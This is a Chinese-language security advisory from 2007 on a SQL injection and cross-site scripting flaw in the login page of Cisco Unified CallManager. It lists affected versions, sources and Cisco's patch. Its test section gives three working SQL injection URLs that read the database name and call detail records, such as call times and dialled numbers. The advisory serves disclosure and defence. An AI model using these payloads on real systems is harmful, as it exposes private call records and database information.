安全研究
安全漏洞
Cisco CallManager/Communications Manager SQL注入及跨站脚本漏洞
发布日期:2007-08-28
更新日期:2007-08-30
受影响系统:
Cisco Unified CallManager 4.2不受影响系统:
Cisco Unified CallManager 4.1
Cisco Unified CallManager 3.3
Cisco Unified Communications Manager 4.3
Cisco Unified CallManager 4.2(3)sr2描述:
Cisco Unified CallManager 4.1(3)sr5
Cisco Unified CallManager 3.3(5)sr2b
Cisco Unified Communications Manager 4.3(1)SR1
BUGTRAQ ID: 25480
Cisco Unified Communications Manager(CUCM,之前被称为CallManager)是Cisco IP电话解决方案中的呼叫处理组件。
CUCM在处理用户请求数据时存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入或跨站脚本攻击。
如果对管理员或用户登录页面的lang变量输入了特制值的话,就可能触发跨站脚本和SQL注入漏洞,可以通过Web接口使用http或https协议执行攻击。对于跨站脚本漏洞,恶意值包括<script>和</script>标签中的脚本代码;对于SQL注入漏洞,恶意值终止SQL调用而完成对后端数据库的调用。
攻击者可以利用跨站脚本漏洞窃取帐号凭据或在客户端系统运行非授权JavaScript;可以利用SQL注入漏洞从数据库读取单个值,多次成功的攻击可能泄露有关数据库的信息,如用户名和口令信息,以及呼叫记录信息,如呼叫时间和拨打的号码。无法利用这个漏洞更改或删除数据库的呼叫记录信息。
<*来源:Elliot Kendall (ekendall@brandeis.edu)
Gama SEC
链接:http://secunia.com/advisories/26641/
http://marc.info/?l=bugtraq&m=118850300023644&w=2
http://www.cisco.com/warp/public/707/cisco-sa-20070829-ccm.shtml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
建议:
厂商补丁:
Cisco
-----
Cisco已经为此发布了一个安全公告(cisco-sa-20070829-ccm)以及相应补丁:
cisco-sa-20070829-ccm:XSS and SQL Injection in Cisco CallManager/Unified Communications Manager Logon Page
链接:http://www.cisco.com/warp/public/707/cisco-sa-20070829-ccm.shtml
浏览次数:3024
严重程度:0(网友投票)
绿盟科技给您安全的保障